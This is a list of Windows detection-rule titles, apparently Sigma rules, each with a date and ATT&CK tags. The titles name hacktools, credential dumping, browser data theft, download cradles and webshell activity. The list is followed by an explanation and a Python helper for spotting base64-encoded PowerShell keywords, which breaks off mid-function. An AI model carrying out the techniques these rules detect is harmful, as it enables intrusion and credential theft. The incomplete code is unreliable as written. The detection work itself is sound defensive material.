Unusual Parent Process For Cmd.EXE (Dec 6, 2023): attack.execution, attack.t1059
HackTool - WinPwn Execution (Dec 4, 2023): attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
HackTool - Impacket Tools Execution (Dec 4, 2023): attack.execution, attack.t1557.001
HackTool - winPEAS Execution (Dec 4, 2023): attack.privilege_escalation, attack.t1082, attack.t1087, attack.t1046
Potential Homoglyph Attack Using Lookalike Characters (Dec 4, 2023): attack.defense_evasion, attack.t1036, attack.t1036.003
Writing Of Malicious Files To The Fonts Folder (Dec 4, 2023): attack.t1211, attack.t1059, attack.defense_evasion, attack.persistence
DirLister Execution (Dec 1, 2023): attack.discovery, attack.t1083
Disable Windows IIS HTTP Logging (Dec 1, 2023): attack.defense_evasion, attack.t1562.002
Disabled RestrictedAdminMode For RDS - ProcCreation (Dec 1, 2023): attack.defense_evasion, attack.t1112
Execution from Suspicious Folder (Dec 1, 2023): attack.defense_evasion, attack.t1036
Fsutil Behavior Set SymlinkEvaluation (Dec 1, 2023): attack.execution, attack.t1059
HackTool - HandleKatz LSASS Dumper Execution (Dec 1, 2023): attack.credential_access, attack.t1003.001
HackTool - Htran/NATBypass Execution (Dec 1, 2023): attack.command_and_control, attack.t1090, attack.s0040
HackTool - Inveigh Execution (Dec 1, 2023): attack.credential_access, attack.t1003.001
HackTool - KrbRelay Execution (Dec 1, 2023): attack.credential_access, attack.t1558.003
HackTool - KrbRelayUp Execution (Dec 1, 2023): attack.credential_access, attack.t1558.003, attack.lateral_movement, attack.t1550.003
HackTool - PowerTool Execution (Dec 1, 2023): attack.defense_evasion, attack.t1562.001
HackTool - SafetyKatz Execution (Dec 1, 2023): attack.credential_access, attack.t1003.001
HackTool - SharPersist Execution (Dec 1, 2023): attack.persistence, attack.t1053
HackTool - SharpLdapWhoami Execution (Dec 1, 2023): attack.discovery, attack.t1033, car.2016-03-001
HackTool - SysmonEOP Execution (Dec 1, 2023): cve.2022.41120, attack.t1068, attack.privilege_escalation
Import PowerShell Modules From Suspicious Directories - ProcCreation (Dec 1, 2023): attack.execution, attack.t1059.001
Lolbin Ssh.exe Use As Proxy (Dec 1, 2023): attack.defense_evasion, attack.t1202
Microsoft IIS Service Account Password Dumped (Dec 1, 2023): attack.credential_access, attack.t1003
New Generic Credentials Added Via Cmdkey.EXE (Dec 1, 2023): attack.credential_access, attack.t1003.005
New Remote Desktop Connection Initiated Via Mstsc.EXE (Dec 1, 2023): attack.lateral_movement, attack.t1021.001
Nltest.EXE Execution (Dec 1, 2023): attack.discovery, attack.t1016, attack.t1018, attack.t1482
Operator Bloopers Cobalt Strike Commands (Dec 1, 2023): attack.execution, attack.t1059.003, stp.1u
Operator Bloopers Cobalt Strike Modules (Dec 1, 2023): attack.execution, attack.t1059.003
PDQ Deploy Remote Administration Tool Execution (Dec 1, 2023): attack.execution, attack.lateral_movement, attack.t1072
Potential Active Directory Enumeration Using AD Module - ProcCreation (Dec 1, 2023): attack.reconnaissance, attack.discovery, attack.impact
Potential Arbitrary Code Execution Via Node.EXE (Dec 1, 2023): attack.defense_evasion, attack.t1127
Potential Credential Dumping Attempt Using New NetworkProvider - CLI (Dec 1, 2023): attack.credential_access, attack.t1003
Potential Discovery Activity Via Dnscmd.EXE (Dec 1, 2023): attack.discovery, attack.execution, attack.t1543.003
Potential DLL Sideloading Via DeviceEnroller.EXE (Dec 1, 2023): attack.defense_evasion, attack.t1574.002
Potential Password Spraying Attempt Using Dsacls.EXE (Dec 1, 2023): attack.execution, attack.t1218
Potential Persistence Via Powershell Search Order Hijacking - Task (Dec 1, 2023): attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
Potential PowerShell Execution Policy Tampering - ProcCreation (Dec 1, 2023): attack.defense_evasion
Potential Process Injection Via Msra.EXE (Dec 1, 2023): attack.defense_evasion, attack.t1055
Potential RDP Tunneling Via SSH (Dec 1, 2023): attack.command_and_control, attack.t1572
Potential Recon Activity Via Nltest.EXE (Dec 1, 2023): attack.discovery, attack.t1016, attack.t1482
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE (Dec 1, 2023): attack.credential_access, attack.t1003.005
Potential Renamed Rundll32 Execution (Dec 1, 2023): attack.execution
Potential Signing Bypass Via Windows Developer Features (Dec 1, 2023): attack.defense_evasion
Potential WinAPI Calls Via CommandLine (Dec 1, 2023): attack.execution, attack.t1106
Potentially Over Permissive Permissions Granted Using Dsacls.EXE (Dec 1, 2023): attack.execution, attack.t1218
Powershell Base64 Encoded MpPreference Cmdlet (Dec 1, 2023): attack.defense_evasion, attack.t1562.001
PowerShell Base64 Encoded WMI Classes (Dec 1, 2023): attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
PUA - DefenderCheck Execution (Dec 1, 2023): attack.defense_evasion, attack.t1027.005
PUA - Fast Reverse Proxy (FRP) Execution (Dec 1, 2023): attack.command_and_control, attack.t1090
PUA - NPS Tunneling Tool Execution (Dec 1, 2023): attack.command_and_control, attack.t1090
PUA - Seatbelt Execution (Dec 1, 2023): attack.discovery, attack.t1526, attack.t1087, attack.t1083
Query Usage To Exfil Data (Dec 1, 2023): attack.execution
Renamed BrowserCore.EXE Execution (Dec 1, 2023): attack.t1528, attack.t1036.003
Renamed Mavinject.EXE Execution (Dec 1, 2023): attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
Renamed Msdt.EXE Execution (Dec 1, 2023): attack.defense_evasion, attack.t1036.003
Renamed NetSupport RAT Execution (Dec 1, 2023): attack.defense_evasion
Renamed Plink Execution (Dec 1, 2023): attack.defense_evasion, attack.t1036
Renamed Remote Utilities RAT (RURAT) Execution (Dec 1, 2023): attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592
Renamed Sysinternals Sdelete Execution (Dec 1, 2023): attack.impact, attack.t1485
Renamed Vmnat.exe Execution (Dec 1, 2023): attack.defense_evasion, attack.t1574.002
Root Certificate Installed From Susp Locations (Dec 1, 2023): attack.defense_evasion, attack.t1553.004
SafeBoot Registry Key Deleted Via Reg.EXE (Dec 1, 2023): attack.defense_evasion, attack.t1562.001
Service Registry Key Deleted Via Reg.EXE (Dec 1, 2023): attack.defense_evasion, attack.t1562.001
SQLite Chromium Profile Data DB Access (Dec 1, 2023): attack.credential_access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
SQLite Firefox Profile Data DB Access (Dec 1, 2023): attack.credential_access, attack.t1539, attack.collection, attack.t1005
Suspicious Binary In User Directory Spawned From Office Application (Dec 1, 2023): attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002
Suspicious Git Clone (Dec 1, 2023): attack.reconnaissance, attack.t1593.003
Suspicious Hacktool Execution - Imphash (Dec 1, 2023): attack.credential_access, attack.t1588.002, attack.t1003
Suspicious Hacktool Execution - PE Metadata (Dec 1, 2023): attack.credential_access, attack.t1588.002, attack.t1003
Suspicious IIS URL GlobalRules Rewrite Via AppCmd (Dec 1, 2023): attack.defense_evasion
Suspicious New Instance Of An Office COM Object (Dec 1, 2023): attack.execution, attack.defense_evasion
Suspicious Rundll32 Script in CommandLine (Dec 1, 2023): attack.defense_evasion, attack.t1218.011
Suspicious Shells Spawned by Java Utility Keytool (Dec 1, 2023): attack.initial_access, attack.persistence, attack.privilege_escalation
Suspicious Use of PsLogList (Dec 1, 2023): attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002
Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE (Dec 1, 2023): attack.defense_evasion, attack.t1562.001
Uncommon One Time Only Scheduled Task At 00:00 (Dec 1, 2023): attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005
Unsigned AppX Installation Attempt Using Add-AppxPackage (Dec 1, 2023): attack.persistence, attack.defense_evasion
Potential Persistence Via Netsh Helper DLL (Nov 28, 2023): attack.privilege_escalation, attack.persistence, attack.t1546.007, attack.s0108
Wusa.EXE Executed By Parent Process Located In Suspicious Location (Nov 28, 2023): attack.execution
Wusa.EXE Extracting Cab Files From Suspicious Paths (Nov 28, 2023): attack.execution
Chromium Browser Instance Executed With Custom Extension (Nov 28, 2023): attack.persistence, attack.t1176
Suspicious Chromium Browser Instance Executed With Custom Extension (Nov 28, 2023): attack.persistence, attack.t1176
PUA - AdFind Suspicious Execution (Nov 27, 2023): attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
Scheduled Task Creation (Nov 27, 2023): attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
Rundll32 Execution Without DLL File (Nov 20, 2023): attack.defense_evasion, attack.t1218.011
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities (Nov 20, 2023): attack.credential_access, attack.discovery, attack.t1552
Bad Opsec Defaults Sacrificial Processes With Improper Arguments (Nov 15, 2023): attack.defense_evasion, attack.t1218.011
Findstr GPP Passwords (Nov 15, 2023): attack.credential_access, attack.t1552.006
Findstr Launching .lnk File (Nov 15, 2023): attack.defense_evasion, attack.t1036, attack.t1202, attack.t1027.003
Insensitive Subfolder Search Via Findstr.EXE (Nov 15, 2023): attack.defense_evasion, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
LSASS Process Reconnaissance Via Findstr.EXE (Nov 15, 2023): attack.credential_access, attack.t1552.006
Permission Misconfiguration Reconnaissance Via Findstr.EXE (Nov 15, 2023): attack.credential_access, attack.t1552.006
Proxy Execution Via Wuauclt.EXE (Nov 15, 2023): attack.defense_evasion, attack.t1218, attack.execution
Recon Command Output Piped To Findstr.EXE (Nov 15, 2023): attack.discovery, attack.t1057
Remote File Download Via Findstr.EXE (Nov 15, 2023): attack.defense_evasion, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
Renamed Office Binary Execution (Nov 15, 2023): attack.defense_evasion
Security Tools Keyword Lookup Via Findstr.EXE (Nov 15, 2023): attack.discovery, attack.t1518.001
Suspicious Shim Database Installation via Sdbinst.EXE (Nov 15, 2023): attack.persistence, attack.privilege_escalation, attack.t1546.011
Suspicious Windows Update Agent Empty Cmdline (Nov 15, 2023): attack.defense_evasion, attack.t1036
Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE (Nov 15, 2023): attack.discovery, attack.t1518.001
Uncommon Userinit Child Process (Nov 15, 2023): attack.t1037.001, attack.persistence
Arbitrary File Download Via IMEWDBLD.EXE (Nov 14, 2023): attack.defense_evasion, attack.execution, attack.t1218
Arbitrary File Download Via MSEDGE_PROXY.EXE (Nov 14, 2023): attack.defense_evasion, attack.execution, attack.t1218
Arbitrary File Download Via MSOHTMED.EXE (Nov 14, 2023): attack.defense_evasion, attack.execution, attack.t1218
Arbitrary File Download Via MSPUB.EXE (Nov 14, 2023): attack.defense_evasion, attack.execution, attack.t1218
Arbitrary File Download Via PresentationHost.EXE (Nov 14, 2023): attack.defense_evasion, attack.execution, attack.t1218
Arbitrary File Download Via Squirrel.EXE (Nov 14, 2023): attack.defense_evasion, attack.execution, attack.t1218
File Download And Execution Via IEExec.EXE (Nov 14, 2023): attack.command_and_control, attack.t1105
File Download From Browser Process Via Inline URL (Nov 14, 2023): attack.command_and_control, attack.t1105
File Download Using ProtocolHandler.exe (Nov 14, 2023): attack.defense_evasion, attack.t1218
File Download Via InstallUtil.EXE (Nov 14, 2023): attack.defense_evasion, attack.t1218
File Download Via Windows Defender MpCmpRun.EXE (Nov 14, 2023): attack.defense_evasion, attack.t1218, attack.command_and_control, attack.t1105
Msxsl.EXE Execution (Nov 14, 2023): attack.defense_evasion, attack.t1220
Potential File Download Via MS-AppInstaller Protocol Handler (Nov 14, 2023): attack.defense_evasion, attack.execution, attack.t1218
Potentially Suspicious Electron Application CommandLine (Nov 14, 2023): attack.execution
Process Proxy Execution Via Squirrel.EXE (Nov 14, 2023): attack.defense_evasion, attack.execution, attack.t1218
Remote XSL Execution Via Msxsl.EXE (Nov 14, 2023): attack.defense_evasion, attack.t1220
Suspicious Calculator Usage (Nov 14, 2023): attack.defense_evasion, attack.t1036
Uncommon Child Process Of Appvlp.EXE (Nov 14, 2023): attack.t1218, attack.defense_evasion, attack.execution
XBAP Execution From Uncommon Locations Via PresentationHost.EXE (Nov 14, 2023): attack.defense_evasion, attack.execution, attack.t1218
XSL Script Execution Via WMIC.EXE (Nov 14, 2023): attack.defense_evasion, attack.t1220
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp (Nov 14, 2023): attack.t1021.003, attack.lateral_movement
Suspicious Process By Web Server Process (Nov 11, 2023): attack.persistence, attack.t1505.003, attack.t1190
Portable Gpg.EXE Execution (Nov 10, 2023): attack.impact, attack.t1486
Suspicious Whoami.EXE Execution (Nov 10, 2023): attack.discovery, attack.t1033, car.2016-03-001
Suspicious WmiPrvSE Child Process (Nov 10, 2023): attack.execution, attack.defense_evasion, attack.t1047, attack.t1204.002, attack.t1218.010
Chopper Webshell Process Pattern (Nov 10, 2023): attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
Shell Process Spawned by Java.EXE (Nov 10, 2023): attack.initial_access, attack.persistence, attack.privilege_escalation
Suspicious Processes Spawned by Java.EXE (Nov 10, 2023): attack.initial_access, attack.persistence, attack.privilege_escalation
Webshell Detection With Command Line Keywords (Nov 10, 2023): attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
Webshell Hacking Activity Patterns (Nov 10, 2023): attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
Webshell Tool Reconnaissance Activity (Nov 10, 2023): attack.persistence, attack.t1505.003
Execute Code with Pester.bat (Nov 9, 2023): attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
Csc.EXE Execution From Potentially Suspicious Parent (Nov 6, 2023): attack.execution, attack.t1059.005, attack.t1059.007, attack.defense_evasion, attack.t1218.005, attack.t1027.004
Dynamic .NET Compilation Via Csc.EXE (Nov 6, 2023): attack.defense_evasion, attack.t1027.004
Obfuscated IP Download Activity (Nov 6, 2023): attack.discovery
Obfuscated IP Via CLI (Nov 6, 2023): attack.discovery
HackTool - CrackMapExec Execution Patterns (Nov 6, 2023): attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106
Port Forwarding Activity Via SSH.EXE (Nov 6, 2023): attack.command_and_control, attack.lateral_movement, attack.t1572, attack.t1021.001, attack.t1021.004
Potentially Suspicious Cabinet File Expansion (Nov 6, 2023): attack.execution, attack.t1218
Suspicious Process Execution From Fake Recycle.Bin Folder (Nov 6, 2023): attack.persistence, attack.defense_evasion
Weak or Abused Passwords In CLI (Nov 6, 2023): attack.defense_evasion, attack.execution
AADInternals PowerShell Cmdlets Execution - ProcessCreation (Nov 2, 2023): attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
AgentExecutor PowerShell Execution (Nov 2, 2023): attack.defense_evasion, attack.t1218
Browser Started with Remote Debugging (Nov 2, 2023): attack.credential_access, attack.t1185
Deletion of Volume Shadow Copies via WMI with PowerShell (Nov 2, 2023): attack.impact, attack.t1490
ImagingDevices Unusual Parent/Child Processes (Nov 2, 2023): attack.defense_evasion, attack.execution
Lolbin Defaultpack.exe Use As Proxy (Nov 2, 2023): attack.t1218, attack.defense_evasion, attack.execution
Lolbin Runexehelper Use As Proxy (Nov 2, 2023): attack.defense_evasion, attack.t1218
Lolbin Unregmp2.exe Use As Proxy (Nov 2, 2023): attack.defense_evasion, attack.t1218
Microsoft IIS Connection Strings Decryption (Nov 2, 2023): attack.credential_access, attack.t1003
Net WebClient Casing Anomalies (Nov 2, 2023): attack.execution, attack.t1059.001
Perl Inline Command Execution (Nov 2, 2023): attack.execution, attack.t1059
Php Inline Command Execution (Nov 2, 2023): attack.execution, attack.t1059
Potential COM Objects Download Cradles Usage - Process Creation (Nov 2, 2023): attack.command_and_control, attack.t1105
Potential Data Stealing Via Chromium Headless Debugging (Nov 2, 2023): attack.credential_access, attack.t1185
Potential RDP Session Hijacking Activity (Nov 2, 2023): attack.execution
Potential Suspicious Activity Using SeCEdit (Nov 2, 2023): attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
Potential Suspicious Windows Feature Enabled - ProcCreation (Nov 2, 2023): attack.defense_evasion
Powershell Inline Execution From A File (Nov 2, 2023): attack.execution, attack.t1059.001
Powershell Token Obfuscation - Process Creation (Nov 2, 2023): attack.defense_evasion, attack.t1027.009
PowerShell Web Download (Nov 2, 2023): attack.command_and_control, attack.execution, attack.t1059.001, attack.t1105
Privilege Escalation via Named Pipe Impersonation (Nov 2, 2023): attack.lateral_movement, attack.t1021
Ruby Inline Command Execution (Nov 2, 2023): attack.execution, attack.t1059
Suspicious AgentExecutor PowerShell Execution (Nov 2, 2023): attack.defense_evasion, attack.t1218
Suspicious Execution of Powershell with Base64 (Nov 2, 2023): attack.execution, attack.t1059.001
Suspicious FromBase64String Usage On Gzip Archive - Process Creation (Nov 2, 2023): attack.command_and_control, attack.t1132.001
Suspicious PowerShell Encoded Command Patterns (Nov 2, 2023): attack.execution, attack.t1059.001
Suspicious PowerShell Invocations - Specific - ProcessCreation (Nov 2, 2023): attack.defense_evasion
Suspicious Usage Of ShellExec_RunDLL (Nov 2, 2023): attack.defense_evasion
Suspicious X509Enrollment - Process Creation (Nov 2, 2023): attack.defense_evasion, attack.t1553.004
Use of Pcalua For Execution (Nov 2, 2023): attack.execution, attack.t1059
Assembly Loading Via CL_LoadAssembly.ps1 (Oct 28, 2023): attack.defense_evasion, attack.t1216
Delete All Scheduled Tasks (Oct 28, 2023): attack.impact, attack.t1489
Diskshadow Script Mode - Execution From Potential Suspicious Location (Oct 28, 2023): attack.execution, attack.t1218
Kernel Memory Dump Via LiveKD (Oct 28, 2023): attack.defense_evasion
Password Protected Compressed File Extraction Via 7Zip (Oct 28, 2023): attack.collection, attack.t1560.001
Potential Amazon SSM Agent Hijacking (Oct 28, 2023): attack.command_and_control, attack.persistence, attack.t1219
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI (Oct 28, 2023): attack.defense_evasion, attack.t1564.004
Potential LethalHTA Technique Execution (Oct 28, 2023): attack.defense_evasion, attack.t1218.005
Potential Process Execution Proxy Via CL_Invocation.ps1 (Oct 28, 2023): attack.defense_evasion, attack.t1216
Potential Suspicious Mofcomp Execution (Oct 28, 2023): attack.execution, attack.t1218
WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript (Oct 28, 2023): attack.execution, attack.t1059.005, attack.t1059.007
Potentially Suspicious Child Process Of VsCode (Oct 28, 2023): attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
Renamed Visual Studio Code Tunnel Execution (Oct 28, 2023): attack.command_and_control, attack.t1071.001
Visual Studio Code Tunnel Execution (Oct 28, 2023): attack.command_and_control, attack.t1071.001
Visual Studio Code Tunnel Service Installation (Oct 28, 2023): attack.command_and_control, attack.t1071.001
Visual Studio Code Tunnel Shell Execution (Oct 28, 2023): attack.command_and_control, attack.t1071.001
Potential SPN Enumeration Via Setspn.EXE (Oct 23, 2023): attack.credential_access, attack.t1558.003
Arbitrary File Download Via GfxDownloadWrapper.EXE (Oct 23, 2023): attack.command_and_control, attack.t1105
File Download From IP Based URL Via CertOC.EXE (Oct 23, 2023): attack.command_and_control, attack.execution, attack.t1105
File Download From IP URL Via Curl.EXE (Oct 23, 2023): attack.execution
File Download via CertOC.EXE (Oct 23, 2023): attack.command_and_control, attack.t1105
Potential Privilege Escalation To LOCAL SYSTEM (Oct 23, 2023): attack.resource_development, attack.t1587.001
Potentially Suspicious Office Document Executed From Trusted Location (Oct 23, 2023): attack.defense_evasion, attack.t1202
Remote File Download Via Desktopimgdownldr Utility (Oct 23, 2023): attack.command_and_control, attack.t1105
Suspicious File Download From IP Via Curl.EXE (Oct 23, 2023): attack.execution
Suspicious File Downloaded From Direct IP Via Certutil.EXE (Oct 23, 2023): attack.defense_evasion, attack.t1027
System File Execution Location Anomaly · Oct 18, 2023 · attack.defense_evasion, attack.t1036
7Zip Compressing Dump Files · Oct 18, 2023 · attack.collection, attack.t1560.001
Abused Debug Privilege by Arbitrary Parent Processes · Oct 18, 2023 · attack.privilege_escalation, attack.t1548
Add User to Local Administrators Group · Oct 18, 2023 · attack.persistence, attack.t1098
Add Windows Capability Via PowerShell Cmdlet · Oct 18, 2023 · attack.execution
Always Install Elevated MSI Spawned Cmd And Powershell · Oct 18, 2023 · attack.privilege_escalation, attack.t1548.002
Boot Configuration Tampering Via Bcdedit.EXE · Oct 18, 2023 · attack.impact, attack.t1490
Capture Credentials with Rpcping.exe · Oct 18, 2023 · attack.credential_access, attack.t1003
CobaltStrike Load by Rundll32 · Oct 18, 2023 · attack.defense_evasion, attack.t1218.011
Compress Data and Lock With Password for Exfiltration With 7-ZIP · Oct 18, 2023 · attack.collection, attack.t1560.001
Computer Discovery And Export Via Get-ADComputer Cmdlet · Oct 18, 2023 · attack.discovery, attack.t1033
ConvertTo-SecureString Cmdlet Usage Via CommandLine · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
Copy from Admin Share · Oct 18, 2023 · attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002
Cscript/Wscript Uncommon Script Extension Execution · Oct 18, 2023 · attack.execution, attack.t1059.005, attack.t1059.007
Detected Windows Software Discovery · Oct 18, 2023 · attack.discovery, attack.t1518
Disable of ETW Trace · Oct 18, 2023 · attack.defense_evasion, attack.t1070, attack.t1562.006, car.2016-04-002
Disable Windows Defender AV Security Monitoring · Oct 18, 2023 · attack.defense_evasion, attack.t1562.001
Dism Remove Online Package · Oct 18, 2023 · attack.defense_evasion, attack.t1562.001
DriverQuery.EXE Execution · Oct 18, 2023 · attack.discovery
DumpMinitool Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1036, attack.t1003.001
Elevated System Shell Spawned · Oct 18, 2023 · attack.privilege_escalation, attack.defense_evasion, attack.execution, attack.t1059
Enumeration for Credentials in Registry · Oct 18, 2023 · attack.credential_access, attack.t1552.002
Exchange PowerShell Snap-Ins Usage · Oct 18, 2023 · attack.execution, attack.t1059.001, attack.collection, attack.t1114
Execution Of Non-Existing File · Oct 18, 2023 · attack.defense_evasion
Explorer Process Tree Break · Oct 18, 2023 · attack.defense_evasion, attack.t1036
Exports Registry Key To a File · Oct 18, 2023 · attack.exfiltration, attack.t1012
File Decryption Using Gpg4win · Oct 18, 2023 · attack.execution
File Encryption Using Gpg4win · Oct 18, 2023 · attack.execution
File Encryption/Decryption Via Gpg4win From Suspicious Locations · Oct 18, 2023 · attack.execution
HackTool - Bloodhound/Sharphound Execution · Oct 18, 2023 · attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
HackTool - CoercedPotato Execution · Oct 18, 2023 · attack.defense_evasion, attack.privilege_escalation, attack.t1055
HackTool - CrackMapExec PowerShell Obfuscation · Oct 18, 2023 · attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027.005
HackTool - Mimikatz Execution · Oct 18, 2023 · attack.credential_access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006
HackTool - PCHunter Execution · Oct 18, 2023 · attack.execution, attack.discovery, attack.t1082, attack.t1057, attack.t1012, attack.t1083, attack.t1007
HackTool - PPID Spoofing SelectMyParent Tool Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1134.004
HackTool - Rubeus Execution · Oct 18, 2023 · attack.credential_access, attack.t1003, attack.t1558.003, attack.lateral_movement, attack.t1550.003
HackTool - SharpEvtMute Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1562.002
HackTool - SharpImpersonation Execution · Oct 18, 2023 · attack.privilege_escalation, attack.defense_evasion, attack.t1134.001, attack.t1134.003
HackTool - SharpUp PrivEsc Tool Execution · Oct 18, 2023 · attack.privilege_escalation, attack.t1615, attack.t1569.002, attack.t1574.005
HackTool - SharpView Execution · Oct 18, 2023 · attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033
HackTool - Stracciatella Execution · Oct 18, 2023 · attack.execution, attack.defense_evasion, attack.t1059, attack.t1562.001
HackTool - UACMe Akagi Execution · Oct 18, 2023 · attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
HackTool - Windows Credential Editor (WCE) Execution · Oct 18, 2023 · attack.credential_access, attack.t1003.001, attack.s0005
HackTool - XORDump Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1036, attack.t1003.001
Imports Registry Key From a File · Oct 18, 2023 · attack.t1112, attack.defense_evasion
Imports Registry Key From an ADS · Oct 18, 2023 · attack.t1112, attack.defense_evasion
Indirect Command Execution From Script File Via Bash.EXE · Oct 18, 2023 · attack.defense_evasion, attack.t1202
Indirect Inline Command Execution Via Bash.EXE · Oct 18, 2023 · attack.defense_evasion, attack.t1202
Invoke-Obfuscation CLIP+ Launcher · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
Invoke-Obfuscation COMPRESS OBFUSCATION · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
Invoke-Obfuscation STDIN+ Launcher · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
Invoke-Obfuscation VAR+ Launcher · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
Invoke-Obfuscation Via Stdin · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
Invoke-Obfuscation Via Use Clip · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
Invoke-Obfuscation Via Use MSHTA · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
LOL-Binary Copied From System Directory · Oct 18, 2023 · attack.defense_evasion, attack.t1036.003
LOLBIN Execution From Abnormal Drive · Oct 18, 2023 · attack.defense_evasion
LSASS Dump Keyword In CommandLine · Oct 18, 2023 · attack.credential_access, attack.t1003.001
Malicious Base64 Encoded PowerShell Keywords in Command Lines · Oct 18, 2023 · attack.execution, attack.t1059.001
MMC Spawning Windows Shell · Oct 18, 2023 · attack.lateral_movement, attack.t1021.003
Net.exe Execution · Oct 18, 2023 · attack.discovery, attack.t1007, attack.t1049, attack.t1018, attack.t1135, attack.t1201, attack.t1069.001, attack.t1069.002, attack.t1087.001, attack.t1087.002, attack.lateral_movement, attack.t1021.002, attack.s0039
New Port Forwarding Rule Added Via Netsh.EXE · Oct 18, 2023 · attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
New User Created Via Net.EXE · Oct 18, 2023 · attack.persistence, attack.t1136.001
New User Created Via Net.EXE With Never Expire Option · Oct 18, 2023 · attack.persistence, attack.t1136.001
Non Interactive PowerShell Process Spawned · Oct 18, 2023 · attack.execution, attack.t1059.001
Password Provided In Command Line Of Net.EXE · Oct 18, 2023 · attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
Permission Check Via Accesschk.EXE · Oct 18, 2023 · attack.discovery, attack.t1069.001
Potential Arbitrary File Download Using Office Application · Oct 18, 2023 · attack.defense_evasion, attack.t1202
Potential Browser Data Stealing · Oct 18, 2023 · attack.credential_access, attack.t1555.003
Potential CommandLine Path Traversal Via Cmd.EXE · Oct 18, 2023 · attack.execution, attack.t1059.003
Potential Data Exfiltration Activity Via CommandLine Tools · Oct 18, 2023 · attack.execution, attack.t1059.001
Potential Defense Evasion Via Rename Of Highly Relevant Binaries · Oct 18, 2023 · attack.defense_evasion, attack.t1036.003, car.2013-05-009
Potential Encoded PowerShell Patterns In CommandLine · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
Potential Memory Dumping Activity Via LiveKD · Oct 18, 2023 · attack.defense_evasion
Potential Persistence Attempt Via Existing Service Tampering · Oct 18, 2023 · attack.persistence, attack.t1543.003, attack.t1574.011
Potential PowerShell Command Line Obfuscation · Oct 18, 2023 · attack.execution, attack.defense_evasion, attack.t1027, attack.t1059.001
Potential PowerShell Execution Via DLL · Oct 18, 2023 · attack.defense_evasion, attack.t1218.011
Potential PowerShell Obfuscation Via Reversed Commands · Oct 18, 2023 · attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
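The "Malicious Base64 Encoded PowerShell Keywords in Command Lines" rule above, and the "PowerShell Base64 Encoded IEX Cmdlet", "FromBase64String Cmdlet" and "Invoke Keyword" rules further down, rest on one property of `-EncodedCommand`: the argument is base64 of the script as UTF-16LE, so a fixed keyword always encodes to one of exactly three base64 substrings, depending on where its first byte falls within a 3-byte group. The Python below is an added example written for this page (not the rules' own string lists) that derives those three alignment variants for a keyword, matches them against a command line, and decodes the payload for confirmation. The keyword list, the `-e…` prefix handling and the sample command lines are constructed assumptions.

```python
import base64
import re
from typing import Dict, List, Optional


def encoded_variants(keyword: str) -> List[str]:
    """
    Base64 substrings that appear whenever `keyword` occurs inside an
    -EncodedCommand payload, one per byte alignment (offset 0, 1, 2).
    Only characters fully determined by the keyword's own UTF-16LE bytes are
    kept, so the variants are stable regardless of surrounding script text.
    """
    raw = keyword.encode("utf-16-le")
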